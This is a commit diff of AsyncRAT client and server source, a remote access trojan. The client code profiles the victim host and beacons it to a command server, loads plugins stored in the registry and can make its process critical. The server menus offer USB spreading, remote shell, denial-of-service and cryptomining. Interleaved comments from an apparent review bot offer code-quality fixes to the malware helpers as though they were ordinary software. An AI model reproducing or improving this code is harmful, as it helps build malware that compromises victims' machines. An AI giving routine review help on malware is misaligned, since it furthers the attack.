NYAN CAT 2019-10-06 11:02:41 +03:00
parent 0d0f0792d7
commit 78c6cc75b2
13 changed files with 1242 additions and 1170 deletions


@ -77,7 +77,11 @@
<Compile Include="Algorithm\Zip.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Helper\Anti_Analysis.cs" />
<Compile Include="Helper\CheckMiner.cs" />
<Compile Include="Helper\HwidGen.cs" />
<Compile Include="Helper\IdSender.cs" />
<Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\MutexControl.cs" />
<Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Helper\SetRegistry.cs" />
<Compile Include="Install\NormalStartup.cs" />


@ -88,7 +88,7 @@ namespace Client.Connection
SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
Buffer = new byte[4];
MS = new MemoryStream();
Send(Methods.SendInfo());
Send(IdSender.SendInfo());
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
}
@ -239,7 +239,7 @@ namespace Client.Connection
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)Methods.TheCPUCounter.NextValue()}% RAM {(int)Methods.TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)IdSender.TheCPUCounter.NextValue()}% RAM {(int)IdSender.TheMemCounter.NextValue()}%";
Send(msgpack.Encode2Bytes());
GC.Collect();
}


@ -37,7 +37,7 @@ namespace Client.Handle_Packet
Assembly assembly = AppDomain.CurrentDomain.Load(Zip.Decompress(Convert.FromBase64String(Strings.StrReverse(SetRegistry.GetValue(unpack_msgpack.ForcePathObject("Dll").AsString)))));
Type type = assembly.GetType("Plugin.Plugin");
dynamic instance = Activator.CreateInstance(type);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), Methods._appMutex, Settings.MTX, Settings.BDOS, Settings.Install);
instance.Run(ClientSocket.TcpClient, Settings.ServerCertificate, Settings.Hwid, unpack_msgpack.ForcePathObject("Msgpack").GetAsBytes(), MutexControl.currentApp, Settings.MTX, Settings.BDOS, Settings.Install);
break;
}


@ -0,0 +1,41 @@
using System.Diagnostics;
using System.Linq;
using System.Management;
namespace Client.Helper
{
class CheckMiner
{
public string GetProcess()
{
foreach (var process in Process.GetProcesses())
{
try
{
if (GetCommandLine(process).ToLower().Contains("--donate-level="))
{
SetRegistry.SetValue(Settings.Hwid, "1");
return "1";
}
}
catch { }
}
SetRegistry.SetValue(Settings.Hwid, "0");
return "0";
}
public string GetCommandLine(Process process)
{
try
{
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher("SELECT CommandLine FROM Win32_Process WHERE ProcessId = " + process.Id))
using (ManagementObjectCollection objects = searcher.Get())
{
return objects.Cast<ManagementBaseObject>().SingleOrDefault()?["CommandLine"]?.ToString();
}
}
catch { }
return "";
}
}
}
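Review bot: `GetCommandLine` returns null rather than `""` when the WMI row has no CommandLine, because the `?.` chain on its return line short-circuits, so the `.ToLower()` in `GetProcess` throws and the bare `catch { }` absorbs it for each such process. The outcome is the same, but an exception is standing in for a null check; ending the return expression with `?.ToString() ?? "";` would make the method agree with its own fallback `return "";`. The class also carries no comment on what it decides: any process whose command line contains `--donate-level=` sets the value written through `SetRegistry` under `Settings.Hwid` to "1", a substring match that will also fire on an unrelated process carrying that flag. For anyone analysing a sample, the per-process `Win32_Process` WMI query and the "1"/"0" write are the observable behaviours of this helper.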


@ -0,0 +1,37 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Text;
namespace Client.Helper
{
public static class HwidGen
{
public static string HWID()
{
try
{
return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
Environment.MachineName, Environment.OSVersion
, new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
}
catch
{
return "Err HWID";
}
}
public static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 20).ToUpper();
}
}
}
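Review bot: `HWID()` is undocumented, and its inputs are all ordinary host facts (processor count, user name, machine name, OS version string, total size of the system drive), so the value is not a hardware identifier and can be recomputed by anyone with access to the host. `GetHash` keeps only the first 20 hex characters of an MD5 digest taken over `Encoding.ASCII` bytes, which turns every non-ASCII character in a user or machine name into `?`; distinct hosts can therefore share an ID, and every host that reaches the `catch` shares the literal `Err HWID`. I would say so above the method, e.g. `// Host fingerprint: upper-case first 20 hex chars of MD5(ProcessorCount+UserName+MachineName+OSVersion+system drive size); not unique, not secret.` The `MD5CryptoServiceProvider` instance is also never disposed; wrapping it in `using` would fix that.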


@ -0,0 +1,34 @@
using Client.MessagePack;
using Microsoft.VisualBasic.Devices;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
namespace Client.Helper
{
public class IdSender
{
public static PerformanceCounter TheCPUCounter { get; } = new PerformanceCounter("Processor", "% Processor Time", "_Total");
public static PerformanceCounter TheMemCounter { get; } = new PerformanceCounter("Memory", "% Committed Bytes In Use");
public static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
return msgpack.Encode2Bytes();
}
}
}
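Review bot: `SendInfo` has no summary of the record it builds, although this is the packet that describes the host to the server. A comment listing the keys would make the wire format reviewable without reading every assignment: Packet=`ClientInfo`, then HWID, User, OS, Path, Version, Admin, Performance, Pastebin, Antivirus. Two smaller points in the same method: the `Process` returned by `Process.GetCurrentProcess()` is never disposed, and the CPU counter is sampled twice back to back, so the second `NextValue()` is likely computed over a near-zero interval and the reported CPU figure should not be trusted.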


@ -1,68 +1,15 @@
using Client.MessagePack;
using Client.Connection;
using Microsoft.VisualBasic.Devices;
using Client.Connection;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Net.Sockets;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
using System.Threading;
using System.Drawing.Imaging;
using System.Runtime.InteropServices;
using System.Linq;
namespace Client.Helper
{
static class Methods
{
public static PerformanceCounter TheCPUCounter { get; } = new PerformanceCounter("Processor", "% Processor Time", "_Total");
public static PerformanceCounter TheMemCounter { get; } = new PerformanceCounter("Memory", "% Committed Bytes In Use");
public static string HWID()
{
try
{
return GetHash(string.Concat(Environment.ProcessorCount, Environment.UserName,
Environment.MachineName, Environment.OSVersion
, new DriveInfo(Path.GetPathRoot(Environment.SystemDirectory)).TotalSize));
}
catch
{
return "Err HWID";
}
}
public static string GetHash(string strToHash)
{
MD5CryptoServiceProvider md5Obj = new MD5CryptoServiceProvider();
byte[] bytesToHash = Encoding.ASCII.GetBytes(strToHash);
bytesToHash = md5Obj.ComputeHash(bytesToHash);
StringBuilder strResult = new StringBuilder();
foreach (byte b in bytesToHash)
strResult.Append(b.ToString("x2"));
return strResult.ToString().Substring(0, 20).ToUpper();
}
public static Mutex _appMutex;
public static bool CreateMutex()
{
bool createdNew;
_appMutex = new Mutex(false, Settings.MTX, out createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (_appMutex != null)
{
_appMutex.Close();
_appMutex = null;
}
}
{
public static bool IsAdmin()
{
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
@ -73,7 +20,7 @@ namespace Client.Helper
{
if (Convert.ToBoolean(Settings.BDOS) && IsAdmin())
ProcessCritical.Exit();
CloseMutex();
MutexControl.CloseMutex();
ClientSocket.SslClient?.Close();
ClientSocket.TcpClient?.Close();
}
@ -101,24 +48,6 @@ namespace Client.Helper
}
}
public static byte[] SendInfo()
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "ClientInfo";
msgpack.ForcePathObject("HWID").AsString = Settings.Hwid;
msgpack.ForcePathObject("User").AsString = Environment.UserName.ToString();
msgpack.ForcePathObject("OS").AsString = new ComputerInfo().OSFullName.ToString().Replace("Microsoft", null) + " " +
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"} CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Antivirus();
return msgpack.Encode2Bytes();
}
public static ImageCodecInfo GetEncoder(ImageFormat format)
{
ImageCodecInfo[] codecs = ImageCodecInfo.GetImageDecoders();


@ -0,0 +1,26 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;
namespace Client.Helper
{
public static class MutexControl
{
public static Mutex currentApp;
public static bool CreateMutex()
{
currentApp = new Mutex(false, Settings.MTX, out bool createdNew);
return createdNew;
}
public static void CloseMutex()
{
if (currentApp != null)
{
currentApp.Close();
currentApp = null;
}
}
}
}
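Review bot: `currentApp` is a public writable static field, so any type in the assembly can replace or null the handle that `CreateMutex` and `CloseMutex` are meant to own. `public static Mutex currentApp { get; private set; }` keeps it readable for existing callers while confining writes to this class. The mutex is created with `initiallyOwned` false and only `createdNew` is returned, so it serves purely as a single-instance marker named by `Settings.MTX`; a one-line comment saying so would help, since that name is also a host-visible artefact. The `System.Collections.Generic`, `System.Linq` and `System.Text` usings are unused in this file.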


@ -23,7 +23,7 @@ namespace Client
try
{
if (!Methods.CreateMutex())
if (!MutexControl.CreateMutex())
Environment.Exit(0);
if (Convert.ToBoolean(Settings.Anti))
@ -36,6 +36,8 @@ namespace Client
ProcessCritical.Set();
Methods.PreventSleep();
new CheckMiner().GetProcess();
}
catch { }
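Review bot: `new CheckMiner().GetProcess();` constructs an instance of a class that holds no state and discards the returned string, so the call exists only for its side effect of storing the flag. That deserves a comment at the call site, e.g. `// one-shot scan at startup; GetProcess persists the result, return value unused`, because nothing on this page shows the flag being refreshed later, while the `Ping` message shown earlier reads the stored value every time it is sent. The enclosing `try` starts outside the hunk, and its `catch { }` silently drops any failure of the scan.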


@ -13,7 +13,7 @@ namespace Client
#if DEBUG
public static string Ports = "6606";
public static string Hosts = "127.0.0.1";
public static string Version = "0.5.4";
public static string Version = "0.5.4D";
public static string Install = "false";
public static string InstallFolder = "AppData";
public static string InstallFile = "Test.exe";
@ -26,7 +26,7 @@ namespace Client
public static Aes256 aes256 = new Aes256(Key);
public static string Pastebin = "null";
public static string BDOS = "false";
public static string Hwid = Methods.HWID();
public static string Hwid = HwidGen.HWID();
#else
public static string Ports = "%Ports%";
@ -65,7 +65,7 @@ namespace Client
Pastebin = aes256.Decrypt(Pastebin);
Anti = aes256.Decrypt(Anti);
BDOS = aes256.Decrypt(BDOS);
Hwid = Methods.HWID();
Hwid = HwidGen.HWID();
Serversignature = aes256.Decrypt(Serversignature);
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));
return VerifyHash();


@ -157,7 +157,7 @@
this.listView1.Name = "listView1";
this.listView1.ShowGroups = false;
this.listView1.ShowItemToolTips = true;
this.listView1.Size = new System.Drawing.Size(1320, 440);
this.listView1.Size = new System.Drawing.Size(1354, 440);
this.listView1.TabIndex = 0;
this.listView1.UseCompatibleStateImageBehavior = false;
this.listView1.View = System.Windows.Forms.View.Details;
@ -371,7 +371,7 @@
//
this.botsKillerToolStripMenuItem.Image = global::Server.Properties.Resources.botkiller;
this.botsKillerToolStripMenuItem.Name = "botsKillerToolStripMenuItem";
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.botsKillerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.botsKillerToolStripMenuItem.Text = "Bots Killer";
this.botsKillerToolStripMenuItem.Click += new System.EventHandler(this.BotsKillerToolStripMenuItem_Click);
//
@ -379,7 +379,7 @@
//
this.uSBSpreadToolStripMenuItem1.Image = global::Server.Properties.Resources.usb;
this.uSBSpreadToolStripMenuItem1.Name = "uSBSpreadToolStripMenuItem1";
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.uSBSpreadToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click);
//
@ -387,7 +387,7 @@
//
this.seedTorrentToolStripMenuItem1.Image = global::Server.Properties.Resources.u_torrent_logo;
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
this.seedTorrentToolStripMenuItem1.Click += new System.EventHandler(this.SeedTorrentToolStripMenuItem1_Click_1);
//
@ -395,7 +395,7 @@
//
this.remoteShellToolStripMenuItem1.Image = global::Server.Properties.Resources.shell;
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(260, 34);
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
this.remoteShellToolStripMenuItem1.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem1_Click_1);
//
@ -403,7 +403,7 @@
//
this.dOSAttackToolStripMenuItem.Image = global::Server.Properties.Resources.ddos;
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1);
//
@ -411,7 +411,7 @@
//
this.executeNETCodeToolStripMenuItem.Image = global::Server.Properties.Resources.coding;
this.executeNETCodeToolStripMenuItem.Name = "executeNETCodeToolStripMenuItem";
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.executeNETCodeToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.executeNETCodeToolStripMenuItem.Text = "Execute .NET Code";
this.executeNETCodeToolStripMenuItem.Click += new System.EventHandler(this.ExecuteNETCodeToolStripMenuItem_Click_1);
//
@ -422,14 +422,14 @@
this.killToolStripMenuItem});
this.xMRMinerToolStripMenuItem.Image = global::Server.Properties.Resources.xmr;
this.xMRMinerToolStripMenuItem.Name = "xMRMinerToolStripMenuItem";
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.xMRMinerToolStripMenuItem.Size = new System.Drawing.Size(260, 34);
this.xMRMinerToolStripMenuItem.Text = "XMR Miner";
//
// runToolStripMenuItem
//
this.runToolStripMenuItem.Image = global::Server.Properties.Resources.tomem1;
this.runToolStripMenuItem.Name = "runToolStripMenuItem";
this.runToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.runToolStripMenuItem.Size = new System.Drawing.Size(152, 34);
this.runToolStripMenuItem.Text = "Run";
this.runToolStripMenuItem.Click += new System.EventHandler(this.RunToolStripMenuItem_Click);
//
@ -437,7 +437,7 @@
//
this.killToolStripMenuItem.Image = global::Server.Properties.Resources.stop__1_;
this.killToolStripMenuItem.Name = "killToolStripMenuItem";
this.killToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
this.killToolStripMenuItem.Size = new System.Drawing.Size(152, 34);
this.killToolStripMenuItem.Text = "Stop";
this.killToolStripMenuItem.Click += new System.EventHandler(this.KillToolStripMenuItem_Click);
//
@ -620,7 +620,7 @@
this.toolStripStatusLabel2});
this.statusStrip1.Location = new System.Drawing.Point(0, 479);
this.statusStrip1.Name = "statusStrip1";
this.statusStrip1.Size = new System.Drawing.Size(1334, 32);
this.statusStrip1.Size = new System.Drawing.Size(1368, 32);
this.statusStrip1.TabIndex = 1;
this.statusStrip1.Text = "statusStrip1";
//
@ -659,7 +659,7 @@
this.tabControl1.Location = new System.Drawing.Point(0, 0);
this.tabControl1.Name = "tabControl1";
this.tabControl1.SelectedIndex = 0;
this.tabControl1.Size = new System.Drawing.Size(1334, 479);
this.tabControl1.Size = new System.Drawing.Size(1368, 479);
this.tabControl1.SizeMode = System.Windows.Forms.TabSizeMode.Fixed;
this.tabControl1.TabIndex = 2;
//
@ -669,7 +669,7 @@
this.tabPage1.Location = new System.Drawing.Point(4, 29);
this.tabPage1.Name = "tabPage1";
this.tabPage1.Padding = new System.Windows.Forms.Padding(3);
this.tabPage1.Size = new System.Drawing.Size(1326, 446);
this.tabPage1.Size = new System.Drawing.Size(1360, 446);
this.tabPage1.TabIndex = 0;
this.tabPage1.Text = "Clients";
//
@ -904,7 +904,7 @@
//
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(1334, 511);
this.ClientSize = new System.Drawing.Size(1368, 511);
this.Controls.Add(this.tabControl1);
this.Controls.Add(this.statusStrip1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));

File diff suppressed because it is too large Load Diff


@ -15,7 +15,7 @@ namespace Server
public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12";
public static X509Certificate2 ServerCertificate;
public static readonly string Version = "AsyncRAT 0.5.4C";
public static readonly string Version = "AsyncRAT 0.5.4D";
public static object LockListviewClients = new object();
public static object LockListviewLogs = new object();
public static object LockListviewThumb = new object();